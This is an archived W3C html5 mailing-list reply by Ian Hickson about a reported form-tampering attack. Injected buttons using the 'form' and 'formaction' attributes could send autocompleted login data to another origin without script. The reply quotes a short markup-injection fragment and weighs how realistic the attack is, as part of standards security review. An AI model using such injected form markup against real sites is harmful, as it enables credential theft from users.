Re: [html5] Input attributes allow form tampering from Ian Hickson on 2011-08-03 (public-html-comments@w3.org from August 2011)

From: Ian Hickson <ian@hixie.ch>
Date: Wed, 3 Aug 2011 22:56:45 +0000 (UTC)
To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
Cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
Message-ID: <Pine.LNX.4.64.1108032226280.14673@ps20323.dreamhostps.com>

On Wed, 3 Aug 2011, Philippe De Ryck wrote:
> On Tue, 2011-08-02 at 21:50 +0000, Ian Hickson wrote:
> > On Tue, 2 Aug 2011, Philippe De Ryck wrote:
> > >
> > > The new form attributes, which can be used with submit buttons, can 
> > > make it difficult for a user to distinguish the form that is being 
> > > submitted. This can be used by an adversary to trick the user into 
> > > submitting a form, such as an autocompleted login form. Even though 
> > > this attack was already possible with JavaScript enabled, this new 
> > > vector does not depend on scripts. Additionally, it is possible that 
> > > current content validation filters do not yet prevent against button 
> > > injection.
> > 
> > Surely this was already possible by just injecting </form><form 
> > action...> in the same place as the button would be inserted today?
> 
> It is indeed very likely that form injection would also be possible. The 
> difference however is that by injecting a button, you can trick the user 
> into submitting a form that is located somewhere else on the page.

Oh, my apologies. I misunderstood. I thought you meant the new formaction, 
etc, attributes, not the new "form" attribute.

So the attack you are concerned about is that a page that has both a form 
for sensitive information and an area with user-generated content could be 
attacked such that a victim is convinced to enter the sensitive 
information in the form, and then convinced to submit the form using a 
button elsewhere on the page, which, through the use of both the form="" 
attribute and the formaction="" attribute, can then result in the form 
information being sent to a different origin?

I always hesitate to minimise the risk in security risk assessments, but 
this does seem somewhat convoluted. Are you aware of any page that has 
such a form, accepts user input, and uses a blacklist rather than whitelist,
and allows <button> or <input> to be inserted unescaped but not <script>?

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'

Received on Wednesday, 3 August 2011 22:57:18 UTC